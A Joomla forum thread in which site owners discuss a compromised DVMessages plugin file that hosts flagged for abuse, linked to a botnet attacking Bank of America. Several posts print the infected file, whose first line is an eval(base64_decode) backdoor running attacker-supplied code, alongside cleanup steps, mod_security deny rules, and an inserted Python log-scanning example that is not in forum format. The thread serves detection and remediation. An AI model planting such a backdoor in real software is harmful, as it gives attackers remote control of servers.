
dvmessages.php is being reported as phishing file?

Posted: Wed Feb 20, 2013 10:15 pm
by stryka
Is dvmessages.php a valid Joomla file? My host is claiming abuse notices from Bank of America, and we have double-checked everything and have not found any updated files...

We did notice that the Joomla error logs are not being populated as of recently... not sure how to get that going again, but the path in site config seems fine.

We did find a few of the following in the raw logs...

184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"

We are currently using Akeeba admin to turn off the site temporarily.

So if you can tell us how to get logging back on and what else I should check...

thanks
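The log line quoted above is exactly the kind of entry to hunt for: a Joomla plugin file is only ever meant to be included by index.php, so a direct request to anything under /plugins/ that the server answers with 200, and especially a POST to it, points at a file being used as a web shell rather than as a plugin. The following Python is an added example for this thread (not code from the poster or from the Joomla project) that parses Apache combined-format access log lines and reports such direct plugin hits per source IP and method. Apart from the first line, which is the one quoted in the post, the sample log lines are constructed here.

```python
import re
from collections import Counter

# Constructed sample access log (Apache combined format). The first entry is
# the one quoted in the post above; the remaining three are made up here so
# the detector has a benign request and a second source address to contrast.
SAMPLE_LOG = """\
184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
203.0.113.9 - - [20/Feb/2013:15:08:01 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
184.173.241.57 - - [20/Feb/2013:15:09:40 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
198.51.100.4 - - [20/Feb/2013:15:10:02 +0000] "GET /plugins/system/dvmessages/dvmessages.php HTTP/1.1" 200 0 "-" "curl/7.19.7"
"""

# One combined-format record: ip ident user [timestamp] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A .php file directly under /plugins/... being requested by a client. Plugins
# are loaded through index.php, so a direct hit is never normal site traffic.
PLUGIN_DIRECT = re.compile(r'^/plugins/[^?]+\.php(\?|$)')


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_direct_plugin_hits(log_text):
    """Return the parsed records for direct plugin requests that succeeded (HTTP 200)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; skip rather than guess
        if PLUGIN_DIRECT.match(rec["path"]) and rec["status"] == "200":
            hits.append(rec)
    return hits


def summarize(hits):
    """Count hits per (source IP, method); repeated POSTs from one address are the signal."""
    return Counter((h["ip"], h["method"]) for h in hits)


if __name__ == "__main__":
    for (ip, method), count in summarize(find_direct_plugin_hits(SAMPLE_LOG)).items():
        print(f"{ip} {method} x{count}")
```

Run against a real access log, feed the file contents in place of SAMPLE_LOG; the addresses and paths it reports are what you would hand to the host together with the abuse notice.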

Re: dvmessages.php is being reported as phishing file?

Posted: Sat Feb 23, 2013 11:18 am
by rozahonar
I have sort of the same question. The server company that we have a contract with sent us an email.
It claims that 'dvmessages.php' in the 'plugins/system/dvmessages.php' path is malware. Do you have any experience with this?
I'm looking forward to your answers.
Regards,

Re: dvmessages.php is being reported as phishing file?

Posted: Sat Feb 23, 2013 12:17 pm
by mandville
Is this an extension plugin for http://extensions.joomla.org/extensions ... ames/10999
What are the contents of the file?

As for your logging issues, try deleting the current log file and see if that will restart it. Check the logging settings with your host.

Re: dvmessages.php is being reported as phishing file?

Posted: Tue Feb 26, 2013 2:19 pm
by pera
This is the second time I have gotten a notice from the Abuse Team, Bank of America.
The code of the file is:

Code:

<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
jimport( 'joomla.application.component.helper' );
class plgSystemDVMessages extends JPlugin
{
	var $message;

	function plgSystemDVMessages(& $subject, $config) {
		parent::__construct($subject, $config);
	}
	
	function onAfterInitialise()
	{
		global $_PROFILER, $mainframe, $database, $_SESSION;
		$plugin			=& JPluginHelper::getPlugin('system', 'dvmessages');
		$pluginParams	= new JParameter( $plugin->params );

		$document = &JFactory::getDocument();
		$temps = $mainframe->getMessageQueue();
		if ($temps) {
			foreach($temps as $temp) {
				if ($temp['message'] != '') {
					$messages = $temp;
				}
			}
		}

		if ($messages) {
			if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
			!$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
				$type = '';
				if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
					$type = 'info';
				} elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
					$type = 'alert';
				} elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
					$type = 'error';
				} elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
					$type = 'info';
				}
				
				if ($type != '') {
					JHTML::_('behavior.mootools');
					$document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
					$document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
					$document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
					$document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');
					
					$document->addScriptDeclaration("
						jQuery.noConflict();			
						jQuery(document).ready(function(){
							Sexy.$type('".addslashes($messages['message'])."');
						});
					");
					
					if ($pluginParams->get('hide_css', 1)) {
						$document->addScriptDeclaration("
							jQuery.noConflict();
							jQuery(document).ready(function(){
								document.getElementById('system-message').style.display = 'none';
							});
						");
					}
				}
			}
		}
		return true;
	}
}
The abuse team advised me to check with:
curl -A "Mozilla/4.0" -iL [URL]
I get

Code:

[root@srv5 dvmessages]# curl -A "Mozilla/4.0" -iL http://www.xxx/plugins/system/dvmessages/dvmessages.php
HTTP/1.1 200 OK
Date: Tue, 26 Feb 2013 14:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.20
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
Any advice?

Re: dvmessages.php is being reported as phishing file?

Posted: Tue Feb 26, 2013 6:45 pm
by annalanga
Hello,

Oh, so I'm not the only one having this problem then :-[

I got a message today from my host stating there is suspicious code in ../plugins/system/dvmessages/dvmessages.php which may result in malicious activity. I cannot recall installing the mentioned extension. Is it possible it came with anything else?

Now when I'm checking the plugins folder there is no sign of dvmessages. How weird?

Re: dvmessages.php is being reported as phishing file?

Posted: Tue Feb 26, 2013 8:37 pm
by ionut
@pera, the first line

Code:

defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
for sure doesn't look nice.

Re: dvmessages.php is being reported as phishing file?

Posted: Tue Feb 26, 2013 10:38 pm
by kadukeitor
My hosting provider just sent me a similar warning. Is it a cyber attack? I see nothing strange in the code... Please, can anyone tell me where the attack is?

Re: dvmessages.php is being reported as phishing file?

Posted: Wed Feb 27, 2013 3:39 pm
by pera
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php:

Code:

<?php
/**

*/

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );
But on the "infected" dvmessages.php:

Code:

<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
This is an old plugin for Joomla 1.5... best is to not use it, or?

Re: dvmessages.php is being reported as phishing file?

Posted: Wed Feb 27, 2013 6:53 pm
by PhilD
Well, obviously (based on the posted code) the code is now part of a larger hack, with likely more files installed somewhere on the site.

My advice is to disable and completely remove all traces of the plugin, and also you (and everyone jumping on with a "me too") are going to have to follow the advice and procedures here: http://forum.joomla.org/viewtopic.php?f=621&t=582854 in order to properly remove the hack and clean the site(s).

I would NOT install or use the plugin after you have cleaned the site. It may or may not be the source of the site's insecurity, but until you know for sure, don't use it.

Re: dvmessages.php is being reported as phishing file?

Posted: Fri Mar 08, 2013 3:25 am
by Dumdeedum
This is definitely part of a larger effort. This is a very dangerous hack that is much, much larger than Bank of America, and all administrators should remove this plugin and follow the instructions from PhilD above. Additionally, if you administrate your own server (i.e. a VPS or dedicated server), then you should also secure your temp directory (and also your Joomla temp directory, if different from your system temp). Below is an example of how you might be able to do that.

http://www.techrepublic.com/blog/openso ... -linux/171

Re: dvmessages.php is being reported as phishing file?

Posted: Thu Mar 21, 2013 12:29 pm
by kevinm2
Your server is now part of a botnet if you have this file (or others).

http://www.prolexic.com/news-events-pr-threat-advisory-ddos-itsoknoproblembro.html

The itsoknoproblembro botnet uses these files...

If you have these files on your Joomla (or WordPress) then your installation has been compromised by the automated attack tools the botnet uses; this would mean you have old versions of Joomla or WordPress installed.

You need to update Joomla/WordPress to the most recent versions, remove any components/plugins that are not being used, then audit all files uploaded to your hosting account for malicious changes/compromised back doors.

Re: dvmessages.php is being reported as phishing file?

Posted: Fri Mar 22, 2013 9:21 pm
by skate323k137
This botnet has been firing up again the last couple of days. Tons of Joomla sites are being used to DDoS Bank of America.

According to access logs on affected servers, it looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:

Code:

change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );
The infection itself means that either your Joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (Super) Administrator password(s).

Re: dvmessages.php is being reported as phishing file?

Posted: Thu Mar 28, 2013 5:05 pm
by Sampao
skate323k137 wrote:This botnet has been firing up again the last couple of days. Tons of Joomla sites are being used to DDoS Bank of America.

According to access logs on affected servers, it looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:

Code:

change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );
The infection itself means that either your Joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (Super) Administrator password(s).

So, we're all in the same boat... Three of my sites have been attacked and my hosting company sent me several complaints from Bank of America. Also, on my sites plugins/system/dvmessages.php was mentioned every time. I have now changed the parameters of all three files, but I don't think this will change much. My Joomla install is marked as updated, except on one site where I have to update manually.

Sorry to ask: "Upgrade your software" >> which software, please?

This is what my dvmessages.php file contains now:

Code:

params );
		$document = &JFactory::getDocument();
		$temps = $mainframe->getMessageQueue();
		if ($temps) {
			foreach($temps as $temp) {
				if ($temp['message'] != '') {
					$messages = $temp;
				}
			}
		}

		if ($messages) {
			if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
			!$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
				$type = '';
				if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
					$type = 'info';
				} elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
					$type = 'alert';
				} elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
					$type = 'error';
				} elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
					$type = 'info';
				}

				if ($type != '') {
					JHTML::_('behavior.mootools');
					$document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
					$document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
					$document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
					$document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');

					$document->addScriptDeclaration("
						jQuery.noConflict();
						jQuery(document).ready(function(){
							Sexy.$type('".addslashes($messages['message'])."');
						});
					");

					if ($pluginParams->get('hide_css', 1)) {
						$document->addScriptDeclaration("
							jQuery.noConflict();
							jQuery(document).ready(function(){
								document.getElementById('system-message').style.display = 'none';
							});
						");
					}
				}
			}
		}
		return true;
	}
}

Re: dvmessages.php is being reported as phishing file?

Posted: Thu Mar 28, 2013 5:20 pm
by skate323k137
The only one of these I tracked down in domlogs tracked to com_installer. That should have been patched a long time ago. Are you in a shared hosting environment, like on a cPanel server with other customers? If so, you should ask your host if they've applied a patch to prevent cross-account symbolic links.

If you have root access you should install ConfigServer Firewall and mod_security. ConfigServer Firewall will block IPs that trip mod_security more than five times. If you make a modsec rule that denies the URI, the bots trying to hit it will be banned. Sometimes after you clean the file the bots still try to access it for days, causing high server load. Put this in modsec2.user.conf or one of the first include files referenced in that file:

Code:

SecRule REQUEST_URI "/plugins/system/dvmessages.php" "chain,id:1234942,msg:dvmessages"
SecRule SERVER_NAME "domain.com"
Change domain.com to the site being attacked. If it affects several sites, just make it a one-line rule:

Code:

SecRule REQUEST_URI "/plugins/system/dvmessages.php" "id:1234943,msg:dvmessages"

Re: dvmessages.php is being reported as phishing file?

Posted: Thu Mar 28, 2013 5:49 pm
by Sampao
To skate323k137:

Was that last message for me? If yes, I can't follow your instructions, honestly.

Re: dvmessages.php is being reported as phishing file?

Posted: Thu Mar 28, 2013 6:36 pm
by skate323k137
It was, though it will help anyone in this situation if they are on a Linux server. Are you hosted on a shared server, or do you have root access to your hosting environment (i.e. VPS or dedicated server)?

Re: dvmessages.php is being reported as phishing file?

Posted: Mon Apr 01, 2013 7:07 am
by chm289
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
What does smh mean?

Re: dvmessages.php is being reported as phishing file?

Posted: Fri Apr 26, 2013 7:11 am
by PseudZ
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.

Thanks

Re: dvmessages.php is being reported as phishing file?

Posted: Thu May 09, 2013 5:11 pm
by horus_68
PseudZ wrote:What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.

Thanks
The extension reported here is
DVMessages - http://archive.extensions.joomla.org/ex ... ames/10999